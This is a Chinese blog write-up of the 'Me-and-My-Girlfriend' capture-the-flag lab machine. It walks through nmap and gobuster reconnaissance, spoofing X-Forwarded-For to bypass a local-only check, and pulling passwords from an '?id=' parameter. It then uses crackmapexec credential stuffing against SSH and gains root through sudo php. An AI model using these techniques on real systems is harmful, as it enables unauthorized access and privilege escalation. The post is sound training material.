打个靶机-Me-and-My-Girlfriend

dkeyi

于 2024-09-11 23:02:00 发布

阅读量323

点赞数 3

分类专栏：网络安全靶机文章标签：网络安全 web安全安全

本文链接：https://blog.csdn.net/dkeyi/article/details/142152156

版权

靶机同时被 2 个专栏收录

8 篇文章 1 订阅

订阅专栏

网络安全

6 篇文章 1 订阅

订阅专栏

一、信息搜集

直接附上nmap信息。

# Nmap 7.94 scan initiated Wed Aug  2 08:21:07 2023 as: nmap -sT -sC -sV -O -A -p22,80 -o nmap_details.txt 192.168.56.115
Nmap scan report for 192.168.56.115
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:53:17:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# nmap --script=vuln -p22,80 192.168.56.115 -o nmap_vuln.txt 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 08:21 EDT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Nmap scan report for 192.168.56.115
Host is up (0.00076s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'

首先整理思路，p22的ssh服务基本不考虑，最后实在没有出路了可以进行整理信息进行爆破尝试，所以路线很明确，直接进行web渗透。

二、WEB渗透

$ curl -i -L http://192.168.56.115/

HTTP/1.1 200 OK
Date: Wed, 02 Aug 2023 12:23:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Vary: Accept-Encoding
Content-Length: 120
Content-Type: text/html

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

可以看到注释，这是又是一台极具CTF风格的机器。

进行简单的gobuster目录爆破。

$ gobuster dir -u http://192.168.56.115 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

/.html                (Status: 403) [Size: 286]
/index.php            (Status: 200) [Size: 120]
/.php                 (Status: 403) [Size: 285]
/misc                 (Status: 301) [Size: 314] [--> http://192.168.56.115/misc/]
/config               (Status: 301) [Size: 316] [--> http://192.168.56.115/config/]
/robots.txt           (Status: 200) [Size: 32]

注释中说“Maybe you can search how to use x-forwarded-for”

HTTP X-Forwarded-For 介绍 | 菜鸟教程 (runoob.com)https://www.runoob.com/w3cnote/http-x-forwarded-for.html

所以我们进行伪造。

打开启动burpsuite，添加一条如图的替换规则，就可以进行简单、仿真的伪造。

打开burpsuite自带的浏览器

这里出现了一些小插曲，所以靶机ip地址改变，不影响

注册信息然后登陆进去。

我们在登录的网站链接中可以看到 “?id=” 的字样，可以考虑一下简单的注入尝试。

很简单的成功了。

这里需要学习的是，在CTF系列中对于 “?id=” 之类的一些注入点字样的敏感度。

发现在源代码中可以看到用户名和密码。

我们拿到了一些敏感信息了。

三、SSH爆破

首先，我要讲一讲为什么我们要进行爆破了。

这个网站并没有提供文件上传之类的交互点，只是很简单的一个网站，而我们通过这个网站的一些漏洞拿到了一些敏感的信息，必然怀疑他们在别的地方也有很大用处。

这里本人还是采用一个一个保存然后一起用，你们可以手工去做，也可以用脚本，但是这个用户量属实不多。

尝试撞库登陆ssh

$ crackmapexec ssh 192.168.43.75 -u username -p password --continue-on-success

SSH         192.168.43.75   22     192.168.43.75    [+] alice:4lic3

爆破成功！

alice@gfriEND:~$ ls -liah

total 32K
 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
    12 drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
 21128 -rw------- 1 alice alice  154 Aug  2 21:01 .bash_history
 21090 -rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
 21089 -rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
 21126 drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
 21091 -rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile

发现有flag和笔记文件。

alice@gfriEND:~/.my_secret$ cat flag1.txt  my_notes.txt

Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes

看一下权限。

alice@gfriEND:/home$ sudo -l

Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php

发现有PHP的root权限，那就非常简单了。

alice@gfriEND:/home$ sudo php -r 'system("/bin/bash");'

root@gfriEND:/home# id
uid=0(root) gid=0(root) groups=0(root)

root@gfriEND:/root# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

本靶机结束，本文章中提到的一个爆破工具 crackmapexec 非常常用且博大精深，建议学习一下，我可能会出专题。

dkeyi

关注

3
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
打个靶机-Me-and-My-Girlfriend

这个网站并没有提供文件上传之类的交互点，只是很简单的一个网站，而我们通过这个网站的一些漏洞拿到了一些敏感的信息，必然怀疑他们在别的地方也有很大用处。首先整理思路，p22的ssh服务基本不考虑，最后实在没有出路了可以进行整理信息进行爆破尝试，所以路线很明确，直接进行。本靶机结束，本文章中提到的一个爆破工具 crackmapexec 非常常用且博大精深，建议学习一下，我可能会出专题。id=” 的字样，可以考虑一下简单的注入尝试。打开启动burpsuite，添加一条如图的替换规则，就可以进行简单、仿真的伪造。
复制链接

扫一扫

专栏目录